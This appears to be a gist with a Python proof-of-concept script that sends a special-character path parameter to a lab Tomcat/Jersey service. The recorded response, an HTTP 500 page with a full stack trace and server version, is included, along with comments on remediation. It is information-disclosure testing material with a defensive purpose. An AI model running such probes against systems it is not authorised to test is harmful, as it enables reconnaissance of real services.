
@HouqiyuA
Created May 13, 2025 08:49
servce_features-information-disclosure
import requests
import urllib.parse
# Target under test. 192.168.126.129 is an RFC 1918 private address, so this
# script is wired to a local lab instance; the connection is plain HTTP.
HOST = "192.168.126.129"
PORT = 8080
BASE_URL = "http://" + HOST + ":" + str(PORT)
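def test_path_injection(base_path, test_cases):
    """Send one GET per test case and print the request and the raw response.

    For each ``name -> value`` entry in ``test_cases``, the first two
    occurrences of the placeholder ``aaa`` in ``base_path`` are replaced with
    the value and the resulting path is requested from ``BASE_URL``.

    The point of the exercise is to see how the server reports malformed
    identifiers: a hardened service answers with a generic 4xx body, while a
    5xx page carrying a stack trace or a server banner is an information
    disclosure worth fixing.

    Args:
        base_path: URL path containing ``aaa`` placeholder segments.
        test_cases: Mapping of a human-readable case name to the string that
            replaces the placeholders.

    Returns:
        None. Results are printed to stdout.
    """
    headers = {
        "Accept": "application/json",
        # NOTE(review): this Host header does not match HOST:PORT above;
        # presumably the service sits behind a port mapping -- confirm.
        "Host": "localhost:50100",
    }
    for test_name, test_value in test_cases.items():
        # Construct test path by replacing the first two 'aaa' segments.
        # The value is inserted verbatim (not percent-encoded), so characters
        # with URL meaning such as '#' or '?' cut the path short: what is
        # printed as "Full path" is not necessarily what the server receives.
        test_path = base_path.replace("aaa", test_value, 2)
        url = f"{BASE_URL}{test_path}"
        print(f"\n[+] Testing {test_name}: {test_value}")
        print(f"Full path: {test_path}")
        try:
            # A timeout keeps an unresponsive target from hanging the run.
            response = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException as e:
            # Connection, timeout and invalid-URL failures are reported and
            # the remaining cases still run.
            print(f"Error occurred: {e}")
            continue
        # Print request and response details
        print("\nRequest sent:")
        print(" Method: GET")
        print(f" URL: {url}")
        print(f" Headers: {headers}")
        print("\nResponse received:")
        print(f" Status Code: {response.status_code}")
        print(f" Headers: {response.headers}")
        print(f" Body: {response.text}")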
if __name__ == "__main__":
    # Both 'aaa' segments are placeholders that get swapped for the test value.
    original_path = "/products/aaa/configurations/aaa"

    # One case only: a run of punctuation. The '#' in it starts the URL
    # fragment, which is why the recorded response below reports the id as
    # just "!@" -- the rest of the path never reaches the server.
    #
    # What the recorded response demonstrates: an unknown id surfaces as an
    # unhandled ObjectNotFoundException, and Tomcat's default error report
    # returns HTTP 500 with the full stack trace, internal class names and the
    # Tomcat version. Server-side remediation is to map the exception to a
    # plain 404 (e.g. a JAX-RS ExceptionMapper) and to disable the verbose
    # report (Tomcat ErrorReportValve showReport / showServerInfo, or a custom
    # error page).
    cases = {"Special Chars": "!@#$%^&*()"}

    for banner in (
        "[*] Starting path parameter injection tests",
        f"Original path: {original_path}",
        f"Target server: {BASE_URL}",
    ):
        print(banner)

    test_path_injection(original_path, cases)
    print("\n[*] Testing completed")
'''
Response received:
Status Code: 500
Headers: {'Server': 'Apache-Coyote/1.1', 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'POST, PUT, GET, OPTIONS, DELETE', 'Access-Control-Allow-Headers': 'x-requested-with', 'Access-Control-Max-Age': '3600', 'Content-Type': 'text/html;charset=utf-8', 'Content-Language': 'en', 'Content-Length': '6881', 'Date': 'Tue, 13 May 2025 08:46:10 GMT', 'Connection': 'close'}
Body: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.32 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 500 - org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</h1><div class="line"></div><p><b>type</b> Exception report</p><p><b>message</b> <u>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found</u></p><p><b>description</b> <u>The server encountered an internal error that prevented it from fulfilling this request.</u></p><p><b>exception</b></p><pre>javax.servlet.ServletException: org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:489)
org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
</pre><p><b>root cause</b></p><pre>org.javiermf.features.exceptions.ObjectNotFoundException: Object with id !@ has not been found
org.javiermf.features.daos.ProductsDAO.findByName(ProductsDAO.java:41)
org.javiermf.features.daos.ProductsDAO$$FastClassBySpringCGLIB$$94b988be.invoke(&lt;generated&gt;)
org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.invokeJoinpoint(CglibAopProxy.java:720)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:157)
org.springframework.dao.support.PersistenceExceptionTranslationInterceptor.invoke(PersistenceExceptionTranslationInterceptor.java:136)
org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:179)
org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:655)
org.javiermf.features.daos.ProductsDAO$$EnhancerBySpringCGLIB$$39a01f0f.findByName(&lt;generated&gt;)
org.javiermf.features.services.ProductsService.findByName(ProductsService.java:41)
org.javiermf.features.services.ProductsService$$FastClassBySpringCGLIB$$36810a9e.invoke(&lt;generated&gt;)
org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:204)
org.springframework.aop.framework.CglibAopProxy$DynamicAdvisedInterceptor.intercept(CglibAopProxy.java:651)
org.javiermf.features.services.ProductsService$$EnhancerBySpringCGLIB$$29ac44ef.findByName(&lt;generated&gt;)
org.javiermf.features.services.rest.ProductsResource.getProductByName(ProductsResource.java:44)
sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
java.lang.reflect.Method.invoke(Method.java:498)
org.glassfish.jersey.server.model.internal.ResourceMethodInvocationHandlerFactory$1.invoke(ResourceMethodInvocationHandlerFactory.java:81)
org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher$1.run(AbstractJavaResourceMethodDispatcher.java:144)
org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.invoke(AbstractJavaResourceMethodDispatcher.java:161)
org.glassfish.jersey.server.model.internal.JavaResourceMethodDispatcherProvider$TypeOutInvoker.doDispatch(JavaResourceMethodDispatcherProvider.java:205)
org.glassfish.jersey.server.model.internal.AbstractJavaResourceMethodDispatcher.dispatch(AbstractJavaResourceMethodDispatcher.java:99)
org.glassfish.jersey.server.model.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:389)
org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:347)
org.glassfish.jersey.server.model.ResourceMethodInvoker.apply(ResourceMethodInvoker.java:102)
org.glassfish.jersey.server.ServerRuntime$2.run(ServerRuntime.java:326)
org.glassfish.jersey.internal.Errors$1.call(Errors.java:271)
org.glassfish.jersey.internal.Errors$1.call(Errors.java:267)
org.glassfish.jersey.internal.Errors.process(Errors.java:315)
org.glassfish.jersey.internal.Errors.process(Errors.java:297)
org.glassfish.jersey.internal.Errors.process(Errors.java:267)
org.glassfish.jersey.process.internal.RequestScope.runInScope(RequestScope.java:317)
org.glassfish.jersey.server.ServerRuntime.process(ServerRuntime.java:305)
org.glassfish.jersey.server.ApplicationHandler.handle(ApplicationHandler.java:1154)
org.glassfish.jersey.servlet.WebComponent.serviceImpl(WebComponent.java:473)
org.glassfish.jersey.servlet.WebComponent.service(WebComponent.java:427)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:388)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:341)
org.glassfish.jersey.servlet.ServletContainer.service(ServletContainer.java:228)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:121)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
org.javiermf.features.CORSFilter.doFilter(CORSFilter.java:29)
</pre><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/8.0.32 logs.</u></p><hr class="line"><h3>Apache Tomcat/8.0.32</h3></body></html>
'''